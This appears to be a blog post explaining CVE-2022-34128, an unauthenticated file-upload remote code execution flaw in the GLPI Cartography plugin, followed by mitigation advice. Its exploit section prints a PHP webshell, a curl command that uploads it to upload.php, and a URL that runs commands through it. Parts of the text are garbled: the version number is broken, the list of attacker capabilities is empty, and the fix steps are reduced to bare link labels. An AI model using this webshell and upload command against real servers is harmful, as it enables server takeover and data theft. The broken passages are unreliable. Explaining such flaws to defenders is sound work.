CVE CyberSecurity Database News

CVE-2022-34128 - How a Bug in GLPI Cartography Plugin Lets Hackers Run Code on Your Server

Poster -

If you’re running GLPI to manage your IT assets, there’s something important you need to know. A dangerous security vulnerability named CVE-2022-34128 was found in a widely-used GLPI plugin called Cartography (also known as "positions"). If you don’t fix it, attackers can take control of your GLPI server by running any code they want—putting your whole IT management at risk.

In this post, I’ll break down what the bug is, how it works, and show a sample exploit so you see how serious it is. I’ll keep the language simple and straightforward so anyone can understand it.

What Is GLPI and What’s Cartography?

GLPI is a popular open-source IT management system. It lets you track devices, assets, tickets, and much more. Cartography (or "positions") is a plugin that helps you map your devices and positions on a plan or map.

If you want more details:  
- GLPI Official Site
- Cartography Plugin page

What is CVE-2022-34128?

The bug is a remote code execution (RCE) vulnerability in Cartography plugin versions before 6..1. It all comes down to front/upload.php, a script in Cartography that handles file uploads.

When the server later processes these files, the code gets executed.

If exploited, anyone could run their own PHP scripts on your server—without needing to log in.

Official advisory and sources:  
- GLPI Security Advisory  
- Vulnerability Details on NVD

Where’s the Problem?

The vulnerable script is:  
/plugins/cartography/front/upload.php

Instead of strictly checking what you upload, this script lets through files with PHP code. That lets attackers upload—say—a webshell.

Example Exploit

Let’s create a small, easy-to-understand example. This is how an attacker could upload malicious code using curl—just as a proof-of-concept:

1. Create a simple PHP webshell

// save as shell.php
<?php system($_GET['cmd']); ?>

This very short code lets you run system commands via your browser: ?cmd=ls will list the files, for example.

Here's what that might look like from the attacker’s PC

curl -F "file=@shell.php" http://your-glpi-server/plugins/cartography/front/upload.php

*Note: The real parameter name for file may vary based on plugin version or configuration.*

3. Access the shell

After upload, the file is somewhere on the server—often accessible through the web server’s public directory. If, for example, the file became accessible at:

http://your-glpi-server/plugins/cartography/uploads/shell.php?cmd=whoami

Requesting that URL would execute whoami on your server, and return the result.

Why Is This Dangerous?

Because attackers don’t need a username or password—*nobody* is safe unless you upgrade. With RCE, an attacker can:

How to Protect Yourself

The fix is simple:

- Cartography Release Page
- GLPI Plugin Directory

Remove or disable the Cartography plugin.

- Block access to /plugins/cartography/front/upload.php using your web server configuration (e.g., .htaccess, nginx config).

Conclusion

CVE-2022-34128 is a critical vulnerability in the Cartography plugin for GLPI. It’s easy to exploit and can let attackers take over your server. All you need to do is update to the latest version of the Cartography plugin. Don’t put it off—this is about the security of all the assets and information you track with GLPI.

Other references:  
- Exploit-DB entry  
- NIST NVD CVE Detail

Stay safe, keep your software up-to-date!

*If you have questions or need help, drop a comment or reach out to the GLPI community.*

Timeline

Published on: 04/16/2023 03:15:00 UTC
Last modified on: 04/25/2023 18:21:00 UTC